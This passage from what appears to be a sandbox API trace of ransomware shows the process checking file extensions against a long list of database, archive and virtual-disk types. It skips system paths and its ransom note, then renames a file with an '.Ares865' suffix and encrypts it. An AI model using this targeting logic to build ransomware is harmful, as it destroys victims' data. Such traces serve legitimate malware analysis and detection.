lstrlenW (lpString="trm") returned 3 [0063.381] lstrcmpiW (lpString1="jpg", lpString2="trm") returned -1 [0063.381] lstrlenW (lpString="udb") returned 3 [0063.381] lstrcmpiW (lpString1="jpg", lpString2="udb") returned -1 [0063.381] lstrlenW (lpString="udl") returned 3 [0063.381] lstrcmpiW (lpString1="jpg", lpString2="udl") returned -1 [0063.381] lstrlenW (lpString="usr") returned 3 [0063.381] lstrcmpiW (lpString1="jpg", lpString2="usr") returned -1 [0063.381] lstrlenW (lpString="v12") returned 3 [0063.381] lstrcmpiW (lpString1="jpg", lpString2="v12") returned -1 [0063.381] lstrlenW (lpString="vis") returned 3 [0063.381] lstrcmpiW (lpString1="jpg", lpString2="vis") returned -1 [0063.381] lstrlenW (lpString="vpd") returned 3 [0063.381] lstrcmpiW (lpString1="jpg", lpString2="vpd") returned -1 [0063.381] lstrlenW (lpString="vvv") returned 3 [0063.381] lstrcmpiW (lpString1="jpg", lpString2="vvv") returned -1 [0063.381] lstrlenW (lpString="wdb") returned 3 [0063.382] lstrcmpiW (lpString1="jpg", lpString2="wdb") returned -1 [0063.382] lstrlenW (lpString="wmdb") returned 4 [0063.382] lstrcmpiW (lpString1=".jpg", lpString2="wmdb") returned -1 [0063.382] lstrlenW (lpString="wrk") returned 3 [0063.382] lstrcmpiW (lpString1="jpg", lpString2="wrk") returned -1 [0063.382] lstrlenW (lpString="xdb") returned 3 [0063.382] lstrcmpiW (lpString1="jpg", lpString2="xdb") returned -1 [0063.382] lstrlenW (lpString="xld") returned 3 [0063.382] lstrcmpiW (lpString1="jpg", lpString2="xld") returned -1 [0063.382] lstrlenW (lpString="xmlff") returned 5 [0063.382] lstrcmpiW (lpString1="s.jpg", lpString2="xmlff") returned -1 [0063.382] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.Ares865") returned 88 [0063.382] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\bears.jpg"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\bears.jpg.ares865"), dwFlags=0x1) returned 1 [0063.383] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\bears.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0063.383] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1074) returned 1 [0063.383] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0063.383] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0063.383] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0063.383] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0063.384] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0063.384] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.384] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x164 [0063.386] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0x190000 [0063.386] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0063.387] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0063.387] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.387] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0063.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0063.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0063.387] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0063.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0063.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0063.388] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0063.388] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0063.388] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0063.388] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0063.388] CloseHandle (hObject=0x164) returned 1 [0063.388] CloseHandle (hObject=0x154) returned 1 [0063.388] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0063.388] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0063.388] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0063.388] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x64c3520, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x64c3520, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7bf1d2d9, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x285, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0063.388] lstrcmpiW (lpString1="Desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0063.388] lstrcmpiW (lpString1="Desktop.ini", lpString2="aoldtz.exe") returned 1 [0063.388] lstrcmpiW (lpString1="Desktop.ini", lpString2=".") returned 1 [0063.388] lstrcmpiW (lpString1="Desktop.ini", lpString2="..") returned 1 [0063.388] lstrcmpiW (lpString1="Desktop.ini", lpString2="windows") returned -1 [0063.388] lstrcmpiW (lpString1="Desktop.ini", lpString2="bootmgr") returned 1 [0063.388] lstrcmpiW (lpString1="Desktop.ini", lpString2="temp") returned -1 [0063.388] lstrcmpiW (lpString1="Desktop.ini", lpString2="pagefile.sys") returned -1 [0063.389] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot") returned 1 [0063.389] lstrcmpiW (lpString1="Desktop.ini", lpString2="ids.txt") returned -1 [0063.389] lstrcmpiW (lpString1="Desktop.ini", lpString2="ntuser.dat") returned -1 [0063.389] lstrcmpiW (lpString1="Desktop.ini", lpString2="perflogs") returned -1 [0063.389] lstrcmpiW (lpString1="Desktop.ini", lpString2="MSBuild") returned -1 [0063.389] lstrlenW (lpString="Desktop.ini") returned 11 [0063.389] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned 80 [0063.389] lstrcpyW (in: lpString1=0x2cce48e, lpString2="Desktop.ini" | out: lpString1="Desktop.ini") returned="Desktop.ini" [0063.389] lstrlenW (lpString="Desktop.ini") returned 11 [0063.389] lstrlenW (lpString="Ares865") returned 7 [0063.389] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0063.389] lstrlenW (lpString=".dll") returned 4 [0063.389] lstrcmpiW (lpString1="Desktop.ini", lpString2=".dll") returned 1 [0063.389] lstrlenW (lpString=".lnk") returned 4 [0063.389] lstrcmpiW (lpString1="Desktop.ini", lpString2=".lnk") returned 1 [0063.389] lstrlenW (lpString=".ini") returned 4 [0063.389] lstrcmpiW (lpString1="Desktop.ini", lpString2=".ini") returned 1 [0063.389] lstrlenW (lpString=".sys") returned 4 [0063.389] lstrcmpiW (lpString1="Desktop.ini", lpString2=".sys") returned 1 [0063.389] lstrlenW (lpString="Desktop.ini") returned 11 [0063.389] lstrlenW (lpString="bak") returned 3 [0063.389] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0063.389] lstrlenW (lpString="ba_") returned 3 [0063.389] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0063.389] lstrlenW (lpString="dbb") returned 3 [0063.389] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0063.389] lstrlenW (lpString="vmdk") returned 4 [0063.389] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0063.389] lstrlenW (lpString="rar") returned 3 [0063.389] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0063.389] lstrlenW (lpString="zip") returned 3 [0063.389] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0063.389] lstrlenW (lpString="tgz") returned 3 [0063.389] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0063.389] lstrlenW (lpString="vbox") returned 4 [0063.389] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0063.390] lstrlenW (lpString="vdi") returned 3 [0063.390] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0063.390] lstrlenW (lpString="vhd") returned 3 [0063.390] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0063.390] lstrlenW (lpString="vhdx") returned 4 [0063.390] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0063.390] lstrlenW (lpString="avhd") returned 4 [0063.390] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0063.390] lstrlenW (lpString="db") returned 2 [0063.390] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0063.390] lstrlenW (lpString="db2") returned 3 [0063.390] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0063.390] lstrlenW (lpString="db3") returned 3 [0063.390] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0063.390] lstrlenW (lpString="dbf") returned 3 [0063.390] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0063.390] lstrlenW (lpString="mdf") returned 3 [0063.390] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0063.390] lstrlenW (lpString="mdb") returned 3 [0063.390] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0063.390] lstrlenW (lpString="sql") returned 3 [0063.390] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0063.390] lstrlenW (lpString="sqlite") returned 6 [0063.390] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0063.390] lstrlenW (lpString="sqlite3") returned 7 [0063.390] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0063.390] lstrlenW (lpString="sqlitedb") returned 8 [0063.390] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0063.390] lstrlenW (lpString="xml") returned 3 [0063.390] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0063.390] lstrlenW (lpString="$er") returned 3 [0063.390] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0063.390] lstrlenW (lpString="4dd") returned 3 [0063.390] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0063.390] lstrlenW (lpString="4dl") returned 3 [0063.391] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0063.391] lstrlenW (lpString="^^^") returned 3 [0063.391] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0063.391] lstrlenW (lpString="abs") returned 3 [0063.391] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0063.391] lstrlenW (lpString="abx") returned 3 [0063.391] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0063.391] lstrlenW (lpString="accdb") returned 5 [0063.391] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0063.391] lstrlenW (lpString="accdc") returned 5 [0063.391] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0063.391] lstrlenW (lpString="accde") returned 5 [0063.391] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0063.391] lstrlenW (lpString="accdr") returned 5 [0063.391] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0063.391] lstrlenW (lpString="accdt") returned 5 [0063.391] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0063.391] lstrlenW (lpString="accdw") returned 5 [0063.391] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0063.391] lstrlenW (lpString="accft") returned 5 [0063.391] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0063.391] lstrlenW (lpString="adb") returned 3 [0063.391] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0063.391] lstrlenW (lpString="adb") returned 3 [0063.391] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0063.391] lstrlenW (lpString="ade") returned 3 [0063.391] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0063.391] lstrlenW (lpString="adf") returned 3 [0063.391] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0063.391] lstrlenW (lpString="adn") returned 3 [0063.391] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0063.391] lstrlenW (lpString="adp") returned 3 [0063.391] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0063.391] lstrlenW (lpString="alf") returned 3 [0063.391] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0063.391] lstrlenW (lpString="ask") returned 3 [0063.391] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0063.392] lstrlenW (lpString="btr") returned 3 [0063.392] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0063.392] lstrlenW (lpString="cat") returned 3 [0063.392] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0063.392] lstrlenW (lpString="cdb") returned 3 [0063.392] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0063.392] lstrlenW (lpString="ckp") returned 3 [0063.392] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0063.392] lstrlenW (lpString="cma") returned 3 [0063.392] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0063.392] lstrlenW (lpString="cpd") returned 3 [0063.392] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0063.392] lstrlenW (lpString="dacpac") returned 6 [0063.392] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0063.392] lstrlenW (lpString="dad") returned 3 [0063.392] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0063.392] lstrlenW (lpString="dadiagrams") returned 10 [0063.392] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0063.392] lstrlenW (lpString="daschema") returned 8 [0063.392] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0063.392] lstrlenW (lpString="db-journal") returned 10 [0063.392] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0063.392] lstrlenW (lpString="db-shm") returned 6 [0063.392] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0063.392] lstrlenW (lpString="db-wal") returned 6 [0063.392] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0063.392] lstrlenW (lpString="dbc") returned 3 [0063.392] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0063.392] lstrlenW (lpString="dbs") returned 3 [0063.392] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0063.392] lstrlenW (lpString="dbt") returned 3 [0063.392] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0063.393] lstrlenW (lpString="dbv") returned 3 [0063.393] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0063.393] lstrlenW (lpString="dbx") returned 3 [0063.393] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0063.393] lstrlenW (lpString="dcb") returned 3 [0063.393] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0063.393] lstrlenW (lpString="dct") returned 3 [0063.393] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0063.393] lstrlenW (lpString="dcx") returned 3 [0063.393] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0063.393] lstrlenW (lpString="ddl") returned 3 [0063.393] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0063.393] lstrlenW (lpString="dlis") returned 4 [0063.393] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0063.393] lstrlenW (lpString="dp1") returned 3 [0063.393] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0063.393] lstrlenW (lpString="dqy") returned 3 [0063.393] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0063.393] lstrlenW (lpString="dsk") returned 3 [0063.393] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0063.393] lstrlenW (lpString="dsn") returned 3 [0063.393] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0063.393] lstrlenW (lpString="dtsx") returned 4 [0063.393] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0063.393] lstrlenW (lpString="dxl") returned 3 [0063.393] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0063.393] lstrlenW (lpString="eco") returned 3 [0063.393] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0063.393] lstrlenW (lpString="ecx") returned 3 [0063.393] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0063.393] lstrlenW (lpString="edb") returned 3 [0063.393] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0063.393] lstrlenW (lpString="epim") returned 4 [0063.393] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0063.393] lstrlenW (lpString="fcd") returned 3 [0063.393] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0063.394] lstrlenW (lpString="fdb") returned 3 [0063.394] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0063.394] lstrlenW (lpString="fic") returned 3 [0063.394] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0063.394] lstrlenW (lpString="flexolibrary") returned 12 [0063.394] lstrlenW (lpString="fm5") returned 3 [0063.394] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0063.394] lstrlenW (lpString="fmp") returned 3 [0063.394] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0063.394] lstrlenW (lpString="fmp12") returned 5 [0063.394] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0063.394] lstrlenW (lpString="fmpsl") returned 5 [0063.394] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0063.394] lstrlenW (lpString="fol") returned 3 [0063.394] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0063.394] lstrlenW (lpString="fp3") returned 3 [0063.394] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0063.394] lstrlenW (lpString="fp4") returned 3 [0063.394] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0063.394] lstrlenW (lpString="fp5") returned 3 [0063.394] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0063.394] lstrlenW (lpString="fp7") returned 3 [0063.394] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0063.394] lstrlenW (lpString="fpt") returned 3 [0063.394] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0063.394] lstrlenW (lpString="frm") returned 3 [0063.394] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0063.394] lstrlenW (lpString="gdb") returned 3 [0063.394] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0063.394] lstrlenW (lpString="gdb") returned 3 [0063.394] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0063.394] lstrlenW (lpString="grdb") returned 4 [0063.394] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0063.394] lstrlenW (lpString="gwi") returned 3 [0063.394] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0063.394] lstrlenW (lpString="hdb") returned 3 [0063.395] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0063.395] lstrlenW (lpString="his") returned 3 [0063.395] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0063.395] lstrlenW (lpString="ib") returned 2 [0063.395] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0063.395] lstrlenW (lpString="idb") returned 3 [0063.395] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0063.395] lstrlenW (lpString="ihx") returned 3 [0063.395] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0063.395] lstrlenW (lpString="itdb") returned 4 [0063.395] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0063.395] lstrlenW (lpString="itw") returned 3 [0063.395] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0063.395] lstrlenW (lpString="jet") returned 3 [0063.395] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0063.395] lstrlenW (lpString="jtx") returned 3 [0063.395] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0063.395] lstrlenW (lpString="kdb") returned 3 [0063.395] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0063.395] lstrlenW (lpString="kexi") returned 4 [0063.395] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0063.395] lstrlenW (lpString="kexic") returned 5 [0063.395] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0063.395] lstrlenW (lpString="kexis") returned 5 [0063.395] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0063.395] lstrlenW (lpString="lgc") returned 3 [0063.395] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0063.395] lstrlenW (lpString="lwx") returned 3 [0063.395] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0063.395] lstrlenW (lpString="maf") returned 3 [0063.395] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0063.395] lstrlenW (lpString="maq") returned 3 [0063.395] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0063.395] lstrlenW (lpString="mar") returned 3 [0063.395] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0063.395] lstrlenW (lpString="marshal") returned 7 [0063.396] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0063.396] lstrlenW (lpString="mas") returned 3 [0063.396] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0063.396] lstrlenW (lpString="mav") returned 3 [0063.396] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0063.396] lstrlenW (lpString="maw") returned 3 [0063.396] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0063.396] lstrlenW (lpString="mdbhtml") returned 7 [0063.396] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0063.396] lstrlenW (lpString="mdn") returned 3 [0063.396] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0063.396] lstrlenW (lpString="mdt") returned 3 [0063.396] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0063.396] lstrlenW (lpString="mfd") returned 3 [0063.396] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0063.396] lstrlenW (lpString="mpd") returned 3 [0063.396] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0063.396] lstrlenW (lpString="mrg") returned 3 [0063.396] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0063.396] lstrlenW (lpString="mud") returned 3 [0063.396] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0063.396] lstrlenW (lpString="mwb") returned 3 [0063.396] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0063.396] lstrlenW (lpString="myd") returned 3 [0063.396] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0063.396] lstrlenW (lpString="ndf") returned 3 [0063.396] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0063.396] lstrlenW (lpString="nnt") returned 3 [0063.396] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0063.396] lstrlenW (lpString="nrmlib") returned 6 [0063.396] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0063.396] lstrlenW (lpString="ns2") returned 3 [0063.396] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0063.396] lstrlenW (lpString="ns3") returned 3 [0063.396] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0063.396] lstrlenW (lpString="ns4") returned 3 [0063.396] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0063.397] lstrlenW (lpString="nsf") returned 3 [0063.397] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0063.397] lstrlenW (lpString="nv") returned 2 [0063.397] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0063.397] lstrlenW (lpString="nv2") returned 3 [0063.397] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0063.397] lstrlenW (lpString="nwdb") returned 4 [0063.397] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0063.397] lstrlenW (lpString="nyf") returned 3 [0063.397] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0063.397] lstrlenW (lpString="odb") returned 3 [0063.397] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0063.397] lstrlenW (lpString="odb") returned 3 [0063.397] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0063.397] lstrlenW (lpString="oqy") returned 3 [0063.397] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0063.397] lstrlenW (lpString="ora") returned 3 [0063.397] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0063.397] lstrlenW (lpString="orx") returned 3 [0063.397] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0063.397] lstrlenW (lpString="owc") returned 3 [0063.397] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0063.397] lstrlenW (lpString="p96") returned 3 [0063.397] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0063.397] lstrlenW (lpString="p97") returned 3 [0063.397] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0063.397] lstrlenW (lpString="pan") returned 3 [0063.397] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0063.397] lstrlenW (lpString="pdb") returned 3 [0063.397] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0063.397] lstrlenW (lpString="pdm") returned 3 [0063.397] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0063.397] lstrlenW (lpString="pnz") returned 3 [0063.397] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0063.397] lstrlenW (lpString="qry") returned 3 [0063.397] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0063.397] lstrlenW (lpString="qvd") returned 3 [0063.398] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0063.398] lstrlenW (lpString="rbf") returned 3 [0063.398] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0063.398] lstrlenW (lpString="rctd") returned 4 [0063.398] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0063.398] lstrlenW (lpString="rod") returned 3 [0063.398] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0063.398] lstrlenW (lpString="rodx") returned 4 [0063.398] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0063.398] lstrlenW (lpString="rpd") returned 3 [0063.398] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0063.398] lstrlenW (lpString="rsd") returned 3 [0063.398] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0063.398] lstrlenW (lpString="sas7bdat") returned 8 [0063.398] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0063.398] lstrlenW (lpString="sbf") returned 3 [0063.398] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0063.398] lstrlenW (lpString="scx") returned 3 [0063.398] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0063.398] lstrlenW (lpString="sdb") returned 3 [0063.398] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0063.398] lstrlenW (lpString="sdc") returned 3 [0063.398] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0063.398] lstrlenW (lpString="sdf") returned 3 [0063.398] lstrcmpiW (lpString1="ini", 